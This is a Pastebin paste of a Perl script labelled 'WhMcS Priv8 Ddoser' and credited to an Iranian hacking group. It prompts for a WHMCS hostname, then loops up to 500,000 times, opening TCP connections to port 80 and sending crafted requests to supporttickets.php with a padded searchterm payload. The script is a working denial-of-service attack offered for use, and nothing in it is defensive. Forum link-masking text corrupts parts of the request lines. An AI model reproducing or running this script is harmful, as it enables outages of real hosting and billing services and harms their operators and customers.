Advertisement
ZeekoSec

WhMcS Priv8 Ddoser

Dec 16th, 2014
592
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.93 KB | None | 0 0
  1. #!/usr/bin/perl
  2. # WhMcS Priv8 Ddoser Coded Written By Amir
  3. # IeDb.Ir - IrIsT.Ir - redhathackers.org
  4. #################################
  5. #
  6. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
  7. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
  8. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  9. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
  10. # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
  11. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
  12. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  13. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
  14. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
  15. #
  16. #####################################
  17.  
  18. use IO::Socket;
  19. print "################################################## ########\n";
  20. print "# #\n";
  21. print "# WhMcS Priv8 Ddoser #\n";
  22. print "# Iranian Exploit Database #\n";
  23. print "# example: clients.site.com #\n";
  24. print "# Coded Written By Amir == IeDb.Ir & IeDb.Ir/acc #\n";
  25. print "# Greetz : all members In IeDb.ir And redhathackers.org #\n";
  26. print "# #\n";
  27. print "################################################## ########\n";
  28. print "example = clients.site.com : ";
  29. $HOST = <STDIN>;
  30. chop ($HOST);
  31.  
  32. $i=0;
  33. while($i<500000){
  34. $i++;
  35.  
  36. $lower=1;
  37. $upper=200000;
  38. $random = int(rand( $upper-$lower+1 ) ) + $lower;
  39. $FILE = "searchterm=%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0%0% 0%0%0%0%0%0";
  40. $LENGTH = length $FILE;
  41.  
  42. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "+";
  43. print $get1 "GET /supporttickets.php [Only registered and activated users can see links]";
  44. print $get1 "Host: ".$HOST. "\n";
  45. print $get1 "Content-Type: application/x-[Only registered and activated users can see links]";
  46. print $get1 "Content-Length: ".$LENGTH."\n\n";
  47. print $get1 $FILE;
  48. syswrite STDOUT, "+";
  49. }
  50. # We Are : Red V!per - C0dex - Behzad - Bl4ck M4n - F@riD - Medrik - TaK.FaNaR - ErfanMs - Dj.TiniVini
  51. # 0x0ptim0us - ARTA - 0Day - Det3cT0r - Dj.TiniVini - E2MA3N - H-SK33PY - l4tr0d3ctism - gabby
  52. # IeDb.Ir = IrIsT.Ir = redhathackers.org
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement